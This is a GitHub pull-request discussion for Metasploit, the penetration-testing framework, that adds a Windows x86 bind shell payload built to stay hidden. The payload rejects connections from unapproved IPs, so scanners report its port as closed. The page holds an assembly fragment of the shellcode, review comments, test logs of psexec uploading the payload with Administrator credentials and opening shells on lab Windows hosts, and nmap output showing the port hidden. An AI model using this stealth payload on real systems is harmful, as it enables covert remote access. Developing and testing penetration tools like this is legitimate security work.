hidden single bind shell payload #3017

Merged
merged 1 commit into from Jun 8, 2014

4 participants

@BorjaMerino

This is another alternative to the acl_bind_shell (#2981). In this case, the shellcode will reply with a RST packet to any connection attempt started from an IP different than the one you set with AHOST; so the socket will appear as "closed". This is a good way to keep your shellcode hidden from scanning tools (in win XP even from netstat -an)

I've used the setsockopt() API with SO_CONDITIONAL_ACCEPT and wsaccept() to allow the shellcode approve the connection based on the source address.

I used the shell_bind_tcp of Stephen Fewer to add such functionality. This will mean an increasee of 54 bytes (34 more than the ACL bind shell). Any shellcode optimization is welcome.

More info:
http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html
http://www.youtube.com/watch?v=xYBuaVNQjGA&hd=1

@wvu-r7

You have excellent taste in electronic music, @BorjaMerino. :P

@BorjaMerino

@wvu-r7 thank you :) Hope people enjoy with the payload. Surely the shellcode is more tunable.

@schierlm schierlm commented on an outdated diff Mar 6, 2014
...lcode/windows/x86/src/block/block_hidden_bind_tcp.asm
+ mov eax, DWORD [eax+4] ;
+ mov eax, DWORD [eax+4] ; get the client IP returned in the stack
+ sub eax, 0x2101A8C0 ; compare the client IP with the IP allowed
+ jz return ; if equal returns CF_ACCEPT
+ xor eax, eax ; If not equal, the condition function returns CF_REJECT
+ inc eax
+return:
+ retn 0x20 ; some stack alignment needed to return to mswsock
+
+wsaaccept:
+ push ebx ; length of the sockaddr = nul
+ push ebx ; struct sockaddr = nul
+ push edi ; socket descriptor
+ push 0x33BEAC94 ; hash( "ws2_32.dll", "wsaaccept" )
+ call ebp ; wsaaccept( s, 0, 0, &fnCondition, 0)
+ cmp eax, -1 ; if error jump to condition function to wait for another connection
@schierlm
schierlm added a note Mar 6, 2014

inc eax will also set ZF if eax = -1. You'll have to dec eax again after the conditional jump, but you'll still save one byte as the cmp needs 3 bytes.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@BorjaMerino

@schierlm change added. Thank you :)

@Meatballs1

This doesn't need a new handler, as it doesn't do anything differently than the BindTcp handler.

It would be good if you could specify the source IP via the handler (e.g. to match AHOST)? If not this isn't required.

@Meatballs1

Versus 2012:

msf exploit(psexec) > run

[*] Connecting to the server...
[*] Started bind handler
[*] Authenticating to 192.168.1.3:445|WORKGROUP as user 'Administrator'...
[*] Uploading payload...
[*] Created \iYotEyOb.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.3[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.3[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (iaQdgCPb - "MrrBEfxnSPLiiaoRtHSRaWui")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \iYotEyOb.exe...
[*] Command shell session 1 opened (192.168.1.100:60995 -> 192.168.1.3:4444) at 2014-06-08 13:39:00 +0100

Microsoft Windows [Version 6.2.9200]
(c) 2012 Microsoft Corporation. All rights reserved.

C:\Windows\system32>

XP

msf exploit(psexec) > run

[*] Connecting to the server...
[*] Started bind handler
[*] Authenticating to 192.168.1.8:445|WORKGROUP as user 'Administrator'...
[*] Uploading payload...
[*] Created \IMydbOmZ.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.8[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.8[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (fTbnKJrT - "Mw")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \IMydbOmZ.exe...
[*] Command shell session 2 opened (192.168.1.100:54969 -> 192.168.1.8:4444) at 2014-06-08 13:41:46 +0100

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

Incorrect AHOST:

msf exploit(psexec) > run

[*] Connecting to the server...
[*] Started bind handler
[*] Authenticating to 192.168.1.8:445|WORKGROUP as user 'Administrator'...
[*] Uploading payload...
[*] Created \KBHHaTHk.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.8[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.8[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (OmvBZcyO - "MvYRJy")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \KBHHaTHk.exe...

Incorrect IP:

nmap -n -p6666 192.168.1.8

Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-08 13:46 BST
Nmap scan report for 192.168.1.8
Host is up (0.0039s latency).
PORT     STATE  SERVICE
6666/tcp closed irc
MAC Address: 00:0C:29:A6:71:DF (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.24 seconds

Correct IP:

Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-08 13:46 BST
Nmap scan report for 192.168.1.8
Host is up (0.0011s latency).
PORT     STATE SERVICE
6666/tcp open  irc
MAC Address: 00:0C:29:A6:71:DF (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.17 seconds
@Meatballs1 Meatballs1 merged commit 5881f94 into rapid7:master Jun 8, 2014

1 check passed

Details continuous-integration/travis-ci The Travis CI build passed
@Meatballs1 Meatballs1 added a commit that referenced this pull request Jun 8, 2014
@Meatballs1 Meatballs1 Land #3017, Windows x86 Shell Hidden Bind
A bind shellcode that responds as 'closed' unless the client matches the
AHOST ip.
25ed68a
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment